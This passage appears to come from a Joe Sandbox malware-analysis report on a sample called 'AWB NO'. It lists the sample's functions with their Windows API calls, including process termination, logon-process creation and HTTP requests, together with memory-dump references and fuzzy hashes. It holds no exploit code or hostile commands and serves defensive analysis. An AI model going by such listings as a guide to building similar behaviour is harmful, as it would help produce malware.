                                                                • Part of subcall function 004585F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00458628
                                                                • Part of subcall function 004585F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0045863E
                                                              • GetLengthSid.ADVAPI32(?,00000000,00458977), ref: 00458DAC
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00458DB8
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00458DBF
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00458DD8
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00458977), ref: 00458DEC
                                                              • HeapFree.KERNEL32(00000000), ref: 00458DF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                              • String ID:
                                                              • API String ID: 3008561057-0
                                                              • Opcode ID: 00f70540977adc48f825812fcb131cdb4b0eb531280d4edd44eca526df0130b7
                                                              • Instruction ID: 1202f83664b48131ef9e99016bda2dd279946cd9251d5692b32c9786c7e1d679
                                                              • Opcode Fuzzy Hash: 00f70540977adc48f825812fcb131cdb4b0eb531280d4edd44eca526df0130b7
                                                              • Instruction Fuzzy Hash: 5B119A71500605FFDB109BA4CC49BAF7BB9EB55316F10442EE845A7252DF3AA90CCB68
                                                              Function 00458AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00458B2A
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00458B31
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00458B40
                                                              • CloseHandle.KERNEL32(00000004), ref: 00458B4B
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458B7A
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458B8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                              • Instruction ID: ed19e33b2e557f2e2ca8f62c6805ad1c4b171ce5596787009a0f785d8ccbcb68
                                                              • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                              • Instruction Fuzzy Hash: 47115EB250020DABDF018F94DD49FDE7BADEF08305F144069FE04A2161CB759D68AB65
                                                              Function 0048C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                • Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                • Part of subcall function 004012F3: BeginPath.GDI32(?), ref: 00401373
                                                                • Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040139C
                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0048C1C4
                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0048C1D8
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0048C1E6
                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0048C1F6
                                                              • EndPath.GDI32(00000000), ref: 0048C206
                                                              • StrokePath.GDI32(00000000), ref: 0048C216
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                              • String ID:
                                                              • API String ID: 43455801-0
                                                              • Opcode ID: bc183b863d25148f1850e921a38b1f50aaa057c6c296e3ddc5a0a673332eb76c
                                                              • Instruction ID: ccdd2b6199ca87c5987ba8fb438783b6dd83c6b3b3853e6015e3ed05b8f1b088
                                                              • Opcode Fuzzy Hash: bc183b863d25148f1850e921a38b1f50aaa057c6c296e3ddc5a0a673332eb76c
                                                              • Instruction Fuzzy Hash: FD111B7640010CBFDF11AF90DC88EAE7FADEB08354F048476BE185A1A1D7719D59DBA4
                                                              Function 004203A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004203D3
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 004203DB
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004203E6
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004203F1
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004203F9
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00420401
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                              • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                              • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                              • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                              Function 0046568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0046569B
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004656B1
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 004656C0
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004656CF
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004656D9
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004656E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                              • Instruction ID: 8f6901114866ca14cd986ee1e292bd4770a5f34436d5c21ea24a7dc2b3a2ed97
                                                              • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                              • Instruction Fuzzy Hash: 13F01231641558BBD7215B92DC0DEAF7A7CEFC6B11F00067DFA04D1050E7A51A1587B9
                                                              Function 004674D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 004674E5
                                                              • EnterCriticalSection.KERNEL32(?,?,00411044,?,?), ref: 004674F6
                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00411044,?,?), ref: 00467503
                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00411044,?,?), ref: 00467510
                                                                • Part of subcall function 00466ED7: CloseHandle.KERNEL32(00000000,?,0046751D,?,00411044,?,?), ref: 00466EE1
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467523
                                                              • LeaveCriticalSection.KERNEL32(?,?,00411044,?,?), ref: 0046752A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                              • Instruction ID: 9734b5ccd6540a82fb48e8287cb809d44fcf662c2da7f217d7ce71899fdcd72b
                                                              • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                              • Instruction Fuzzy Hash: 9EF0823A140A12EBDB111B64FC8C9EF773AFF45312B5009BAF203914B0EB7A5815CB59
                                                              Function 00458E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00458E7F
                                                              • UnloadUserProfile.USERENV(?,?), ref: 00458E8B
                                                              • CloseHandle.KERNEL32(?), ref: 00458E94
                                                              • CloseHandle.KERNEL32(?), ref: 00458E9C
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00458EA5
                                                              • HeapFree.KERNEL32(00000000), ref: 00458EAC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                              • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                              • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                              • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                              Function 00479A72 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00457652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?,?,0045799D), ref: 0045766F
                                                                • Part of subcall function 00457652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 0045768A
                                                                • Part of subcall function 00457652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 00457698
                                                                • Part of subcall function 00457652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?), ref: 004576A8
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479B1B
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479C97
                                                              • CoTaskMemFree.OLE32(?), ref: 00479CA2
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 00479CF0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 4175897753-2785691316
                                                              • Opcode ID: ebe263848c27dbf9e64f2b3f6e6418e21ca5e2ce360aea4c262ca110b4188890
                                                              • Instruction ID: 2d6b15105bf64f0131cde1211130cdd8d67b212e7fca3fe919add89d64974377
                                                              • Opcode Fuzzy Hash: ebe263848c27dbf9e64f2b3f6e6418e21ca5e2ce360aea4c262ca110b4188890
                                                              • Instruction Fuzzy Hash: FF913A71D00219ABDF10DFA5DC80EDEBBB9EF08714F20816AF519A7281DB746A45CFA4
                                                              Function 00478902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00478928
                                                              • CharUpperBuffW.USER32(?,?), ref: 00478A37
                                                              • VariantClear.OLEAUT32(?), ref: 00478BAF
                                                                • Part of subcall function 00467804: VariantInit.OLEAUT32(00000000), ref: 00467844
                                                                • Part of subcall function 00467804: VariantCopy.OLEAUT32(00000000,?), ref: 0046784D
                                                                • Part of subcall function 00467804: VariantClear.OLEAUT32(00000000), ref: 00467859
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: c7fb1ca8fcf9f971199011d8e5a62168e428ab9a4dfc4dc2c8aa4ea0de54b6a8
                                                              • Instruction ID: fe893c211d290caf4c1edec6ac9143816d1416bbb96a5f03f5a21eb01c423c59
                                                              • Opcode Fuzzy Hash: c7fb1ca8fcf9f971199011d8e5a62168e428ab9a4dfc4dc2c8aa4ea0de54b6a8
                                                              • Instruction Fuzzy Hash: 8B916DB16043019FC710DF25C48499BBBE4EF89318F14896FF89A9B3A2DB35E905CB56
                                                              Function 00487500 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004875C0
                                                              • IsMenu.USER32(?), ref: 004875D8
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00487620
                                                              • DrawMenuBar.USER32 ref: 00487633
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert
                                                              • String ID: 0
                                                              • API String ID: 3076010158-4108050209
                                                              • Opcode ID: a0e848d2816564b77e3541e417d45c5ea5f81237a21e4ec9dff92fc557af208d
                                                              • Instruction ID: 244ebd32b8f97b81259969125f729c00c6f494ffb7d64cbbbf547a27778ec249
                                                              • Opcode Fuzzy Hash: a0e848d2816564b77e3541e417d45c5ea5f81237a21e4ec9dff92fc557af208d
                                                              • Instruction Fuzzy Hash: 29414775A05608EFDB10EF58D894E9EBBB8FB04320F14882AE915A7390D734ED51CFA4
                                                              Function 0047DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047DAD9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 2358735015-567219261
                                                              • Opcode ID: d36803ba11768605c2707f4de3e3ec1f9e0b2456c8f555283f4410bced6c529b
                                                              • Instruction ID: a8638b0df0228535fab177acacf4a9995d3a54798f321b9b19110b30cd1a555d
                                                              • Opcode Fuzzy Hash: d36803ba11768605c2707f4de3e3ec1f9e0b2456c8f555283f4410bced6c529b
                                                              • Instruction Fuzzy Hash: 76318370A102159FCF00EF55C8819EEB3B4FF05314B10862BA865A76D1DB79B906CB98
                                                              Function 00459372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004593F6
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00459409
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00459439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 787153527-1403004172
                                                              • Opcode ID: b519dd37e8ed530e8a5a145b108ecb2fd32272a5a14c80cc052334e7b82fb37a
                                                              • Instruction ID: c00c561ba6da329c47fc9231c9d51ea779790e0de9441c917b22281e101d07b1
                                                              • Opcode Fuzzy Hash: b519dd37e8ed530e8a5a145b108ecb2fd32272a5a14c80cc052334e7b82fb37a
                                                              • Instruction Fuzzy Hash: B0210471A44108BADB14AB71DC858FFB768DF06354B20412FFD21A72E2DB3C1D0E9A28
                                                              Function 00471B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00471B40
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471B66
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00471B96
                                                              • InternetCloseHandle.WININET(00000000), ref: 00471BDD
                                                                • Part of subcall function 00472777: GetLastError.KERNEL32(?,?,00471B0B,00000000,00000000,00000001), ref: 0047278C
                                                                • Part of subcall function 00472777: SetEvent.KERNEL32(?,?,00471B0B,00000000,00000000,00000001), ref: 004727A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              • Opcode ID: d9ac3558636909731b0b3a236f17b9df6e42c5e20a1b71d5a4cc2f93b1b10254
                                                              • Instruction ID: ee56afe60ffdfdfde2582bf5a9ce9740fcc5a13e0c995de85fa6f6029e89fcc2
                                                              • Opcode Fuzzy Hash: d9ac3558636909731b0b3a236f17b9df6e42c5e20a1b71d5a4cc2f93b1b10254
                                                              • Instruction Fuzzy Hash: 6B21C5716002087FEB119F659CC5EFF76ECEB89748F10812FF409E6250EB68AD095769
                                                              Function 00486656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004866D0
                                                              • LoadLibraryW.KERNEL32(?), ref: 004866D7
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004866EC
                                                              • DestroyWindow.USER32(?), ref: 004866F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: 49ba697defebaeff7bf3c6ed2474ef9451a394873102f99e0ceafb0c30f968ce
                                                              • Instruction ID: 4db44445907f2aaf5c84c958528420195b0187cfe800e99e3e12bc9784e60b19
